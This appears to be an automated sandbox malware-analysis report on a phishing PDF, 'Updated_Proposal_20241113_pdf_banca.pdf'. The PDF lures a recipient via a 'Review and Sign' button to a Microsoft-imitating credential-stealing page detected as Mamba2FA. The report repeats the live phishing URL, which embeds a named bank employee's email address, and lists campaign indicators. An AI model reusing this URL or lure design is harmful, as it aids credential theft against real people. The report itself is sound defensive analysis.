Windows Analysis Report
Updated_Proposal_20241113_pdf_banca.pdf

Overview

General Information

Sample name: Updated_Proposal_20241113_pdf_banca.pdf
Analysis ID: 1555690
MD5: 53d9a51b1c57265887013aac78134bf6
SHA1: faa2f71fb8becfdb149838cfa6e2021052d70a94
SHA256: 79e3ec607922b203c9b48ee2bcc59d7130c38a332ad15fc5cdfe8eec87886319
Infos:

Detection

HTMLPhisher, Mamba2FA
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found potential malicious PDF (bad image similarity)
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
AI detected landing page (webpage, office document or email)
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
IP address seen in connection with other malware
Invalid 'forgot password' link found
Invalid T&C link found

Classification

  • System is w10x64
  • Acrobat.exe (PID: 7332 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Updated_Proposal_20241113_pdf_banca.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7504 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7708 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1384,i,12974326492354929419,14040274795783035196,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 2008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1920,i,5273971204665831357,13377854627728883333,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
1.0.pages.csv | JoeSecurity_Mamba2FA | Yara detected Mamba 2FA PaaS | Joe Security |
1.0.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
1.1.pages.csv | JoeSecurity_Mamba2FA | Yara detected Mamba 2FA PaaS | Joe Security |
1.1.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
No Sigma rule has matched
No Suricata rule has matched

          AV Detection

          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it | SlashNext: Label: Credential Stealing type: Phishing & Social Engineering

          Phishing

          Source: Yara match | File source: 1.0.pages.csv, type: HTML
          Source: Yara match | File source: 1.1.pages.csv, type: HTML
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it
            • Matcher: Found strong image similarity, brand: MICROSOFT
            • Matcher: Template: microsoft matched
            • HTTP Parser: Number of links: 0
            • HTTP Parser: <input type="password" .../> found but no <form action="...
            • HTTP Parser: Title: Authenticating ... does not match URL
            • HTTP Parser: Invalid link: Forgot password?
            • HTTP Parser: Invalid link: Terms of use
            • HTTP Parser: Invalid link: Privacy & cookies
            • HTTP Parser: <input type="password" .../> found
            • HTTP Parser: No favicon
            • HTTP Parser: No <meta name="author".. found
            • HTTP Parser: No <meta name="copyright".. found
          Source: Joe Sandbox View | IP Address: 13.107.246.45
          Source: Joe Sandbox View | IP Address: 18.245.31.5
          Source: Joe Sandbox View | IP Address: 1.1.1.1
          Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.dr | String found in binary or memory: http://x1.i.lencr.org/
          Source: chromecache_190.10.dr | String found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
          Source: chromecache_190.10.dr | String found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
          Source: chromecache_190.10.dr | String found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc
          Source: chromecache_190.10.dr | String found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
          Source: chromecache_193.10.dr | String found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
          Source: chromecache_190.10.dr | String found in binary or memory: https://google.com
          Source: chromecache_190.10.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
          Source: chromecache_190.10.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
          Source: Updated_Proposal_20241113_pdf_banca.pdf | String found in binary or memory: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTk
          Source: chromecache_190.10.dr | String found in binary or memory: https://www.w3schools.com/w3css/4/w3.css

          System Summary

          Source: Updated_Proposal_20241113_pdf_banca.pdf | Static PDF information: Image stream: 12
          Source: classification engine | Classification label: mal84.phis.winPDF@38/73@0/11
          Source: Updated_Proposal_20241113_pdf_banca.pdf | Initial sample: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it
          Source: Updated_Proposal_20241113_pdf_banca.pdf | Initial sample: https://www.shop4myhealth.ukyb.com/m/?c3y9bzm2nv8xx25vbszyyw5kpwf6qkxzv289jnvpzd1vu0vsmdewnziwmjrvtklrvuuwmje4mdcwmtewmjayndiwmjqwnzaxmtgwmjewn0123ndiana.panaccione@banca.mps.it
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-14 04-28-10-465.log
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: unknown | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Updated_Proposal_20241113_pdf_banca.pdf"
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1384,i,12974326492354929419,14040274795783035196,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
          Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1920,i,5273971204665831357,13377854627728883333,262144 /prefetch:8
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: Updated_Proposal_20241113_pdf_banca.pdf | Initial sample: PDF keyword /JS count = 0
          Source: Updated_Proposal_20241113_pdf_banca.pdf | Initial sample: PDF keyword /JavaScript count = 0
          Source: Updated_Proposal_20241113_pdf_banca.pdf | Initial sample: PDF keyword /EmbeddedFile count = 0

          Persistence and Installation Behavior

          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it | LLM: Page contains button: 'Review and Sign' Source: '1.0.pages.csv'
          Source: PDF document | LLM: Page contains button: 'Review and Sign' Source: 'PDF document'
          Source: PDF document | LLM: PDF document contains prominent button: 'review and sign'
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | 1 Spearphishing Link | Windows Management Instrumentation | 1 Browser Extensions | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Information Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
          [Behavior graph: Behavior Graph ID: 1555690, Sample: Updated_Proposal_20241113_p..., Startdate: 14/11/2024, Architecture: WINDOWS, Score: 84]

          No Antivirus matches
          Source | Detection | Scanner | Label
          https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it | 100% | SlashNext | Credential Stealing type: Phishing & Social Engineering
          https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTk | 0% | Avira URL Cloud | safe
          No contacted domains info
          Name | Malicious | Antivirus Detection | Reputation
          https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it | true | SlashNext: Credential Stealing type: Phishing & Social Engineering | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.1.dr | false | | high
          https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTk | Updated_Proposal_20241113_pdf_banca.pdf | false | Avira URL Cloud: safe | unknown
          https://cdn.socket.io/4.6.0/socket.io.min.js | chromecache_190.10.dr | false | | high
          https://google.com | chromecache_190.10.dr | false | | high
          https://cdn.socket.io/4.7.5/socket.io.min.js | chromecache_193.10.dr | false | | high
          https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc | chromecache_190.10.dr | false | | high
          https://www.w3schools.com/w3css/4/w3.css | chromecache_190.10.dr | false | | high
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      50.87.150.217 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | false
                      13.107.246.45 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                      18.245.31.5 | unknown | United States | 16509 | AMAZON-02US | false
                      142.250.74.196 | unknown | United States | 15169 | GOOGLEUS | false
                      1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
                      192.229.133.221 | unknown | United States | 15133 | EDGECASTUS | false
                      239.255.255.250 | unknown | Reserved | unknown | unknown | false
                      188.114.97.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
                      188.114.96.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
                      152.199.21.175 | unknown | United States | 15133 | EDGECASTUS | false
                      13.35.58.91 | unknown | United States | 16509 | AMAZON-02US | false
                      Joe Sandbox version: 41.0.0 Charoite
                      Analysis ID: 1555690
                      Start date and time: 2024-11-14 10:27:14 +01:00
                      Joe Sandbox product: CloudBasic
                      Overall analysis duration: 0h 5m 40s
                      Hypervisor based Inspection enabled: false
                      Report type: full
                      Cookbook file name: defaultwindowspdfcookbook.jbs
                      Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed: 13
                      Number of new started drivers analysed: 0
                      Number of existing processes analysed: 0
                      Number of existing drivers analysed: 0
                      Number of injected processes analysed: 0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode: default
                      Analysis stop reason: Timeout
                      Sample name: Updated_Proposal_20241113_pdf_banca.pdf
                      Detection: MAL
                      Classification: mal84.phis.winPDF@38/73@0/11
                      Cookbook Comments:
                      • Found application associated with file extension: .pdf
                      • Found PDF document
                      • Close Viewer
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                      • Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      • VT rate limit hit for: Updated_Proposal_20241113_pdf_banca.pdf
                      TimeTypeDescription
                      04:28:21API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):292
                                            Entropy (8bit):5.172960934645066
                                            Encrypted:false
                                            SSDEEP:6:HUvq2Pwkn2nKuAl9OmbnIFUt8YUGCZmw+YUGukwOwkn2nKuAl9OmbjLJ:WvYfHAahFUt8F/+X5JfHAaSJ
                                            MD5:76F7DC7AFA24BF5FB28A8C662A9DA1FA
                                            SHA1:1CF8817AA8A4827A5CB0B30C871AD613DA8E0FD8
                                            SHA-256:6B203D5903055F654A3E5A1AE94B39FA0BF30DA1125B9AD7D14A825586871276
                                            SHA-512:46C193753773914DF1C502F853606EEED846571FC817796E7DD6E32FEA33703F8B139C71456592E7CCC6F766ECC7B22D66DF09188356884947A1DF0E4BC462B7
                                            Malicious:false
                                            Reputation:low
                                            Preview:2024/11/14-04:28:08.217 1d74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/14-04:28:08.218 1d74 Recovering log #3.2024/11/14-04:28:08.218 1d74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):336
                                            Entropy (8bit):5.167487038996315
                                            Encrypted:false
                                            SSDEEP:6:HUnuAZL+q2Pwkn2nKuAl9Ombzo2jMGIFUt8YUdKWZmw+YULLVkwOwkn2nKuAl9OU:JAZL+vYfHAa8uFUt8uW/+NLV5JfHAa8z
                                            MD5:C3B079E334A7002FB769237433F5653C
                                            SHA1:4B38F775E67B6FBCCC668DEB2285F6FBE82C542C
                                            SHA-256:3C59A849B06CB62D46114A1111D85AE937699A8D24BB5ADBB5AA01A7DA71C8D7
                                            SHA-512:F28C72C81B5A0650A037BEA405450122E4E4234C0353450D9FCBDBDF7DE893536FBC72EEA71525E231C6ADC323A5D315600FB6E8C3A82EA97A63E5BB27C76D0F
                                            Malicious:false
                                            Reputation:low
                                            Preview:2024/11/14-04:28:08.269 1e3c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/14-04:28:08.270 1e3c Recovering log #3.2024/11/14-04:28:08.270 1e3c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:JSON data
                                            Category:modified
                                            Size (bytes):475
                                            Entropy (8bit):4.957950752632059
                                            Encrypted:false
                                            SSDEEP:12:YH/um3RA8sqosBdOg2H5Icaq3QYiubInP7E4T3y:Y2sRdsEdMH5j3QYhbG7nby
                                            MD5:1A7179D3AAED8989487777CA1A623EA6
                                            SHA1:9CDE04F1571549FD88AB070834896D44A1ABFA92
                                            SHA-256:191B9DFD50658A59A01845B04E0F6381ACFB612B075A36840BFE211FF29F45A9
                                            SHA-512:E0D498830AAEC90495758A8B1BFF6C02333A0336F095E8DB83C0C70066A7241FEFF6A3DFBFEB41D7078AA3311BE3411B315E1CCE2D9AC28E2A3C82AFA334793C
                                            Malicious:false
                                            Reputation:low
                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13376136494192465","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":242172},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):475
                                            Entropy (8bit):4.957950752632059
                                            Encrypted:false
                                            SSDEEP:12:YH/um3RA8sqosBdOg2H5Icaq3QYiubInP7E4T3y:Y2sRdsEdMH5j3QYhbG7nby
                                            MD5:1A7179D3AAED8989487777CA1A623EA6
                                            SHA1:9CDE04F1571549FD88AB070834896D44A1ABFA92
                                            SHA-256:191B9DFD50658A59A01845B04E0F6381ACFB612B075A36840BFE211FF29F45A9
                                            SHA-512:E0D498830AAEC90495758A8B1BFF6C02333A0336F095E8DB83C0C70066A7241FEFF6A3DFBFEB41D7078AA3311BE3411B315E1CCE2D9AC28E2A3C82AFA334793C
                                            Malicious:false
                                            Reputation:low
                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13376136494192465","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":242172},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):4730
                                            Entropy (8bit):5.249408178725766
                                            Encrypted:false
                                            SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo74LDxrrDZ:etJCV4FiN/jTN/2r8Mta02fEhgO73gow
                                            MD5:74A254FB975F4AE7E7B01E1EABB987A4
                                            SHA1:1B698A2159ECED9820BA9069C14A6847838CA7EC
                                            SHA-256:6792F01CD7BC082AE538BC05EB7CC5CC421E3EA938C5E2D84101A08BE7661078
                                            SHA-512:828CD9369B5A8D50C8D4E3E278AC3C9F6B1CF9B47D81F36402A783C2C502B123BE38B94AC115608C6E8FE0151AA475F0651B1405F7841C00880D84D4EA832EED
                                            Malicious:false
                                            Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):324
                                            Entropy (8bit):5.181287918949978
                                            Encrypted:false
                                            SSDEEP:6:HUb+L+q2Pwkn2nKuAl9OmbzNMxIFUt8YUzSFoG1KWZmw+YUzT3LVkwOwkn2nKuAo:A+L+vYfHAa8jFUt8l2oXW/+lT3LV5Jfv
                                            MD5:76A7543EB136071440104690CFB71E4E
                                            SHA1:8ED646D87E7F36196F207D2D0D0E0EC5D608DC53
                                            SHA-256:7A34E4BF22511CA9F5EDD45E9B1AC61D0AD5B7DD3943E0D5C1BC55774AD6D312
                                            SHA-512:906838F4600B87F3547106FB3A6813B9A0CF2F23BB931A14B2EA48BA5F88C805B40C3CEB278A7D2C04B2734E410CA1B9566007EFA18B56F25C36FC90183F0C2A
                                            Malicious:false
                                            Preview:2024/11/14-04:28:08.493 1e3c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/14-04:28:08.530 1e3c Recovering log #3.2024/11/14-04:28:08.568 1e3c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                            Category:dropped
                                            Size (bytes):65110
                                            Entropy (8bit):0.6325819276006657
                                            Encrypted:false
                                            SSDEEP:1536:A4DkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkXkkakkkkkW:AOkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
                                            MD5:45D530C35E61BA60E05D6A82392CF588
                                            SHA1:D39019B0C4AB18AF2E8FA8555DF19A6AFAA7D658
                                            SHA-256:234B54AFCDD8F4174E57914FC6EFCF63C97D1EC9CE88F006B8436B702A1A95B9
                                            SHA-512:C39F31B2727DA223CF2BF93D57235A6B7E47DA683DD6E3A83408ACDB5C25378B513A49AD24C52EEE0011A6D21B2256F3C8AC6E6251A971B7AB33ECBD480E2950
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
                                            Category:dropped
                                            Size (bytes):86016
                                            Entropy (8bit):4.445194332794845
                                            Encrypted:false
                                            SSDEEP:384:Secci5t4iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:Mfs3OazzU89UTTgUL
                                            MD5:A16F56F4627366CCEF6805291315ED15
                                            SHA1:77F20B0E56A8D290D1DB1F4B064D7F2D68EC1DA7
                                            SHA-256:F515865A87611046C4D9E3FA8A8F32BBD1B2E7BDE33D01AEB2596818FB2E2D8B
                                            SHA-512:1C4513859CA4755CD114D0F20FAA6853C2E0BDB88B830788040F5B0AD16F2EE9C890ACAA752E4AF88BD16854D0EC428581A57D5224FC52C66E828FCD0840B949
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:SQLite Rollback Journal
                                            Category:dropped
                                            Size (bytes):8720
                                            Entropy (8bit):2.2150064984862783
                                            Encrypted:false
                                            SSDEEP:48:7M4jenC7vqvmFTIF3XmHjBoGGR+jMz+Lhy:77jenS79IVXEBodRBkM
                                            MD5:B02B2B7D1DC0396E11F361118094C237
                                            SHA1:AF8F2984A75F85007BECD8518B0127060CF1AA4B
                                            SHA-256:5E71A9CAFE9F33D7EF3B5A37667986637BCFA8A13D5C3815395659DF05345D33
                                            SHA-512:4967A6F4C09011A7F14CA5085FA556EBD9E629114C2DB3B28C35A2595966B14ECA3F6956E4343BC9842F47D9BE6E8191BB906A64B0F4C471CBBE2BA3847224C1
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:Certificate, Version=3
                                            Category:dropped
                                            Size (bytes):1391
                                            Entropy (8bit):7.705940075877404
                                            Encrypted:false
                                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                            Category:dropped
                                            Size (bytes):71954
                                            Entropy (8bit):7.996617769952133
                                            Encrypted:true
                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
